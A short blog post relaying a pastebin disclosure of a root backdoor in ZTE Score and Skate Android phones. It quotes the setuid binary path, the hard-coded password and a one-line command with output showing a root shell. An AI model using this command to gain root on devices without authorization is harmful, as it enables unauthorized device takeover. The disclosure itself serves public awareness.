ZTE and Android : a major flaw discovered

A flaw has been discovered on ZTE Score and ZTE Skate. It enables root very easily with a plain text password stored in the device. The following command line can enable root :
I did not have test this myself as I do not have one but it is very interesting to unlock the device ! or .. dangerous according to malwares….

found here : http://pastebin.com/wamYsqTV
The plain text :

The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.

There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device. Just give the magic, hard-coded password to get a root shell:

$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)

Nice backdoor, ZTE.

Leave a Reply